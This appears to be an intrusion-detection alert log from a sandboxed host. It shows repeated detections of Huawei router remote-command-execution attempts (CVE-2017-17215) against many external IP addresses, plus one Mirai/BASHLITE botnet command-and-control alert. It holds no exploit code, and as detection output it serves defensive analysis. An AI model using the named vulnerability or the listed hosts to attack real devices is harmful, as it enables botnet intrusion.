                                                        06/13/24-21:31:59.197767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989237215192.168.2.1441.1.47.57
                                                        06/13/24-21:33:00.885786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3872437215192.168.2.1441.168.85.160
                                                        06/13/24-21:32:30.079616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783037215192.168.2.1441.236.80.153
                                                        06/13/24-21:32:56.787702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291437215192.168.2.1441.7.7.40
                                                        06/13/24-21:32:23.836690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4983837215192.168.2.1441.152.229.249
                                                        06/13/24-21:32:54.711772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243437215192.168.2.14156.183.206.181
                                                        06/13/24-21:32:46.503823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882637215192.168.2.14156.97.147.136
                                                        06/13/24-21:32:28.026050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228037215192.168.2.14156.21.175.123
                                                        06/13/24-21:32:23.941203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454437215192.168.2.14197.144.114.109
                                                        06/13/24-21:32:38.300693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306237215192.168.2.14156.46.147.201
                                                        06/13/24-21:32:40.354056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069237215192.168.2.1441.83.52.72
                                                        06/13/24-21:32:03.278583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5902237215192.168.2.1441.208.140.157
                                                        06/13/24-21:32:36.243960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692637215192.168.2.1441.0.39.185
                                                        06/13/24-21:32:44.476571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090437215192.168.2.1441.35.245.202
                                                        06/13/24-21:32:11.488018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369437215192.168.2.1441.138.87.41
                                                        06/13/24-21:32:23.935597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393437215192.168.2.1441.243.144.74
                                                        06/13/24-21:32:19.729011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631237215192.168.2.1441.109.140.218
                                                        06/13/24-21:32:46.504193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334037215192.168.2.14156.248.180.172
                                                        06/13/24-21:33:02.914132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729437215192.168.2.1441.84.158.211
                                                        06/13/24-21:32:19.751332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3791037215192.168.2.1441.142.23.178
                                                        06/13/24-21:32:42.420279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763037215192.168.2.1441.210.56.200
                                                        06/13/24-21:31:59.175803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.14156.254.199.241
                                                        06/13/24-21:32:36.247295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753037215192.168.2.14197.181.30.90
                                                        06/13/24-21:31:59.176679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874637215192.168.2.14197.66.183.65
                                                        06/13/24-21:33:09.085208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182437215192.168.2.14156.247.189.31
                                                        06/13/24-21:32:40.376360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004237215192.168.2.1441.101.181.25
                                                        06/13/24-21:32:46.509839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917037215192.168.2.14197.169.210.26
                                                        06/13/24-21:32:07.400722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560837215192.168.2.14197.96.146.94
                                                        06/13/24-21:32:13.569313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181437215192.168.2.14156.164.161.4
                                                        06/13/24-21:32:19.730502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532037215192.168.2.14197.118.53.135
                                                        06/13/24-21:32:34.216179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385837215192.168.2.14197.86.47.201
                                                        06/13/24-21:32:07.404263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856437215192.168.2.1441.28.205.6
                                                        06/13/24-21:32:38.322129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791237215192.168.2.14197.14.175.72
                                                        06/13/24-21:32:13.567381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3739037215192.168.2.1441.238.234.105
                                                        06/13/24-21:32:07.416094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265437215192.168.2.14156.222.172.99
                                                        06/13/24-21:32:30.096062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334637215192.168.2.14156.150.60.131
                                                        06/13/24-21:32:40.353161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437237215192.168.2.14156.16.195.5
                                                        06/13/24-21:32:48.572882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727437215192.168.2.14156.120.49.207
                                                        06/13/24-21:32:54.710604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298637215192.168.2.1441.166.90.4
                                                        06/13/24-21:32:58.840063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449237215192.168.2.14197.96.158.121
                                                        06/13/24-21:33:13.231105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5309437215192.168.2.14156.183.36.51
                                                        06/13/24-21:32:48.572494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921237215192.168.2.1441.242.238.90
                                                        06/13/24-21:33:00.774416TCP2840516ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message455441110103.82.38.94192.168.2.14
                                                        06/13/24-21:32:54.708154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980237215192.168.2.14156.103.154.186
                                                        06/13/24-21:33:13.213534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600637215192.168.2.14197.205.165.66
                                                        06/13/24-21:33:13.213899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815837215192.168.2.14156.116.108.41
                                                        06/13/24-21:32:17.694908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4303437215192.168.2.1441.189.109.214
                                                        06/13/24-21:32:25.973929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811837215192.168.2.1441.92.208.12
                                                        06/13/24-21:32:11.488076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956237215192.168.2.14156.236.246.10
                                                        06/13/24-21:32:23.832462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5320837215192.168.2.14197.171.197.106
                                                        06/13/24-21:32:07.403687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820237215192.168.2.14156.190.83.27
                                                        06/13/24-21:32:13.543663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038837215192.168.2.14197.181.173.11
                                                        06/13/24-21:32:42.424674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5457037215192.168.2.14156.255.158.210
                                                        06/13/24-21:33:02.914476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305237215192.168.2.14197.69.115.134
                                                        06/13/24-21:32:07.415465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4819837215192.168.2.1441.41.151.118
                                                        06/13/24-21:32:13.566369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064237215192.168.2.14156.105.56.196
                                                        06/13/24-21:32:28.028887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5804237215192.168.2.14197.49.119.98
                                                        06/13/24-21:32:28.026455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.1441.242.179.230
                                                        06/13/24-21:32:42.421877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6012237215192.168.2.14156.43.177.188
                                                        06/13/24-21:32:01.225114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5005637215192.168.2.14197.91.160.210
                                                        06/13/24-21:32:30.126859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992837215192.168.2.14197.81.159.61
                                                        06/13/24-21:32:13.547328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258037215192.168.2.14197.175.72.60
                                                        06/13/24-21:32:30.100910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349637215192.168.2.14156.9.228.200
                                                        06/13/24-21:32:44.454070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5809637215192.168.2.1441.220.72.149
                                                        06/13/24-21:32:38.301782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544037215192.168.2.14197.117.144.29
                                                        06/13/24-21:32:38.322596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606037215192.168.2.14156.226.242.107
                                                        06/13/24-21:32:44.455078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535837215192.168.2.14197.137.18.237
                                                        06/13/24-21:32:52.671676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190637215192.168.2.14197.135.16.213
                                                        06/13/24-21:33:00.867468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999637215192.168.2.14156.177.92.227
                                                        06/13/24-21:32:11.486818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956637215192.168.2.14156.159.202.147
                                                        06/13/24-21:32:34.216397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4170437215192.168.2.14197.122.241.194
                                                        06/13/24-21:32:40.359492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937237215192.168.2.14197.156.255.211
                                                        06/13/24-21:32:56.756208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949437215192.168.2.14156.184.247.220
                                                        06/13/24-21:32:42.420847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4136037215192.168.2.14156.36.154.196
                                                        06/13/24-21:32:03.279433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792637215192.168.2.14197.69.68.79
                                                        06/13/24-21:33:07.039213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523437215192.168.2.14197.26.36.99
                                                        06/13/24-21:31:57.093441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814837215192.168.2.1441.252.252.230
                                                        06/13/24-21:32:30.073457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834237215192.168.2.1441.232.145.228
                                                        06/13/24-21:32:32.150849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717237215192.168.2.1441.135.1.101
                                                        06/13/24-21:32:58.841032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922437215192.168.2.14197.87.156.203
                                                        06/13/24-21:33:04.987953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140437215192.168.2.14156.183.181.112
                                                        06/13/24-21:32:23.945494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033037215192.168.2.1441.13.90.62
                                                        06/13/24-21:32:30.094415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777237215192.168.2.1441.153.228.23
                                                        06/13/24-21:32:11.506417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815837215192.168.2.14156.254.8.118
                                                        06/13/24-21:32:15.610276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567637215192.168.2.14156.121.30.98
                                                        06/13/24-21:32:38.300113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787837215192.168.2.1441.50.52.125
                                                        06/13/24-21:33:05.012216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478637215192.168.2.1441.185.230.46
                                                        06/13/24-21:32:34.216440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193237215192.168.2.14156.243.74.39
                                                        06/13/24-21:32:28.027709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291237215192.168.2.14156.215.23.133
                                                        06/13/24-21:32:23.835550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304637215192.168.2.1441.185.127.113
                                                        06/13/24-21:33:07.041382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292437215192.168.2.1441.131.110.42
                                                        06/13/24-21:33:04.988443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743437215192.168.2.14156.158.187.184
                                                        06/13/24-21:32:56.789903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459037215192.168.2.14197.37.223.10
                                                        06/13/24-21:32:44.453327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904637215192.168.2.14156.106.222.5
                                                        06/13/24-21:33:11.176668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257637215192.168.2.1441.194.72.41
                                                        06/13/24-21:32:28.048393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067437215192.168.2.1441.175.229.93
                                                        06/13/24-21:33:15.253484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651837215192.168.2.1441.174.211.193
                                                        06/13/24-21:33:15.252684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183437215192.168.2.1441.224.56.22
                                                        06/13/24-21:32:30.123001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598237215192.168.2.1441.226.58.222
                                                        06/13/24-21:32:56.754295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4973837215192.168.2.14156.211.138.198
                                                        06/13/24-21:33:07.040751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4771437215192.168.2.1441.159.56.201
                                                        06/13/24-21:32:28.044417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967437215192.168.2.14156.131.254.51
                                                        06/13/24-21:32:11.509242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421637215192.168.2.1441.232.70.156
                                                        06/13/24-21:32:03.278941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826237215192.168.2.14156.85.29.213
                                                        06/13/24-21:33:11.158159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588637215192.168.2.14156.71.144.184
                                                        06/13/24-21:33:07.041150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963637215192.168.2.1441.160.157.237
                                                        06/13/24-21:33:00.869977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552037215192.168.2.14197.92.255.184
                                                        06/13/24-21:32:56.758975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539037215192.168.2.14197.50.142.219
                                                        06/13/24-21:32:25.977881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706637215192.168.2.1441.191.59.225
                                                        06/13/24-21:32:52.658905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856837215192.168.2.14156.102.184.248
                                                        06/13/24-21:33:09.087792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118437215192.168.2.1441.117.30.120
                                                        06/13/24-21:32:23.943648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713437215192.168.2.14197.179.191.240
                                                        06/13/24-21:32:40.356749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322637215192.168.2.1441.103.20.177
                                                        06/13/24-21:33:09.089343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044637215192.168.2.14156.50.126.193
                                                        06/13/24-21:32:03.273759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793837215192.168.2.14197.22.52.175
                                                        06/13/24-21:32:34.195380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381837215192.168.2.14197.59.166.173
                                                        06/13/24-21:32:17.670786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732237215192.168.2.1441.60.137.0
                                                        06/13/24-21:32:19.729057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967237215192.168.2.14156.186.97.129
                                                        06/13/24-21:32:34.216551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221437215192.168.2.1441.189.113.67
                                                        06/13/24-21:33:07.040132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3949637215192.168.2.1441.58.222.177
                                                        06/13/24-21:32:38.320023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572637215192.168.2.14156.195.73.195
                                                        06/13/24-21:33:02.953780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400037215192.168.2.14197.29.194.142
                                                        06/13/24-21:32:36.246891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115437215192.168.2.14197.197.57.73
                                                        06/13/24-21:32:13.544161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631037215192.168.2.14156.54.199.138
                                                        06/13/24-21:32:56.756907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681237215192.168.2.14197.112.97.145
                                                        06/13/24-21:32:23.938285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739437215192.168.2.14156.3.1.13
                                                        06/13/24-21:32:05.370846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095837215192.168.2.14197.186.85.224
                                                        06/13/24-21:32:28.048789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241037215192.168.2.14197.254.244.133
                                                        06/13/24-21:32:34.194041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572437215192.168.2.14197.150.34.50
                                                        06/13/24-21:31:59.176400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4989437215192.168.2.1441.146.178.217
                                                        06/13/24-21:32:13.545074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4744037215192.168.2.14197.97.2.146
                                                        06/13/24-21:32:11.485956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421037215192.168.2.14156.33.242.137
                                                        06/13/24-21:32:19.749975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401637215192.168.2.14156.220.5.233
                                                        06/13/24-21:32:01.238071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759837215192.168.2.1441.240.242.23
                                                        06/13/24-21:32:40.353596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172037215192.168.2.1441.69.182.100
                                                        06/13/24-21:33:04.988772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597237215192.168.2.1441.167.40.22
                                                        06/13/24-21:32:21.784884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722037215192.168.2.1441.20.137.124
                                                        06/13/24-21:32:38.302128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367637215192.168.2.14156.114.35.153
                                                        06/13/24-21:32:52.657798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624637215192.168.2.14156.70.131.78
                                                        06/13/24-21:31:59.174323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349237215192.168.2.14197.48.44.114
                                                        06/13/24-21:32:30.125181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824637215192.168.2.14156.28.3.71
                                                        06/13/24-21:32:11.508073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815037215192.168.2.1441.0.28.215
                                                        06/13/24-21:32:11.509309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648437215192.168.2.1441.181.243.155
                                                        06/13/24-21:32:05.344772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853637215192.168.2.14197.71.150.229
                                                        06/13/24-21:32:23.832090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397237215192.168.2.14156.231.5.1
                                                        06/13/24-21:32:03.279817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6065437215192.168.2.14156.67.134.124
                                                        06/13/24-21:32:54.724509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877237215192.168.2.1441.121.205.13
                                                        06/13/24-21:31:59.177011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544437215192.168.2.14156.83.50.249
                                                        06/13/24-21:32:09.440980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936037215192.168.2.14156.35.159.249
                                                        06/13/24-21:32:03.306317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284837215192.168.2.14197.153.164.88
                                                        06/13/24-21:33:13.213170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177037215192.168.2.14197.82.202.97
                                                        06/13/24-21:32:52.656729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975637215192.168.2.1441.234.93.250
                                                        06/13/24-21:33:07.042356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935637215192.168.2.1441.141.243.113
                                                        06/13/24-21:31:59.173724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430237215192.168.2.1441.37.97.58
                                                        06/13/24-21:33:07.060290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467237215192.168.2.1441.157.109.170
                                                        06/13/24-21:32:17.676000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250837215192.168.2.14197.162.107.62
                                                        06/13/24-21:32:56.790705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345637215192.168.2.1441.189.132.255
                                                        06/13/24-21:32:17.695550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620037215192.168.2.1441.145.222.44
                                                        06/13/24-21:32:36.242973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934037215192.168.2.1441.175.45.217
                                                        06/13/24-21:32:38.303913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203837215192.168.2.14156.172.118.91
                                                        06/13/24-21:32:44.458400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038637215192.168.2.14197.67.234.172
                                                        06/13/24-21:32:07.400683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947837215192.168.2.1441.63.41.43
                                                        06/13/24-21:32:38.304130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4101837215192.168.2.14197.224.207.206
                                                        06/13/24-21:32:23.938448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027237215192.168.2.14197.131.52.210
                                                        06/13/24-21:32:38.301220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359437215192.168.2.14197.82.148.185
                                                        06/13/24-21:32:34.191303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072437215192.168.2.14197.5.114.194
                                                        06/13/24-21:32:58.839562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428437215192.168.2.14197.83.69.171
                                                        06/13/24-21:31:59.177643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3818437215192.168.2.14197.145.154.253
                                                        06/13/24-21:32:42.418084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790437215192.168.2.1441.255.109.116
                                                        06/13/24-21:32:13.544440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3856037215192.168.2.14197.65.168.235
                                                        06/13/24-21:33:15.274733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416237215192.168.2.14197.156.227.129
                                                        06/13/24-21:32:07.417154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639037215192.168.2.14156.46.17.92
                                                        06/13/24-21:33:15.272541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249237215192.168.2.14197.109.55.187
                                                        06/13/24-21:32:17.696214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026437215192.168.2.14197.51.215.78
                                                        06/13/24-21:32:30.097753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849837215192.168.2.1441.17.98.110
                                                        06/13/24-21:32:19.730743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281837215192.168.2.14156.248.16.232
                                                        06/13/24-21:32:52.679512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366037215192.168.2.14197.97.144.110
                                                        06/13/24-21:33:15.275555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954237215192.168.2.14156.222.16.0
                                                        06/13/24-21:32:05.345282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4604037215192.168.2.1441.231.15.82
                                                        06/13/24-21:32:58.841649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965237215192.168.2.14156.18.151.251
                                                        06/13/24-21:33:11.176825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083837215192.168.2.14156.169.46.232
                                                        06/13/24-21:32:05.349450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4078037215192.168.2.1441.168.205.37
                                                        06/13/24-21:32:40.356502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4279237215192.168.2.1441.176.48.237
                                                        06/13/24-21:32:40.373346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450837215192.168.2.1441.43.184.211
                                                        06/13/24-21:32:07.403510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120237215192.168.2.14156.246.145.222
                                                        06/13/24-21:32:46.508292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453237215192.168.2.14156.209.27.242
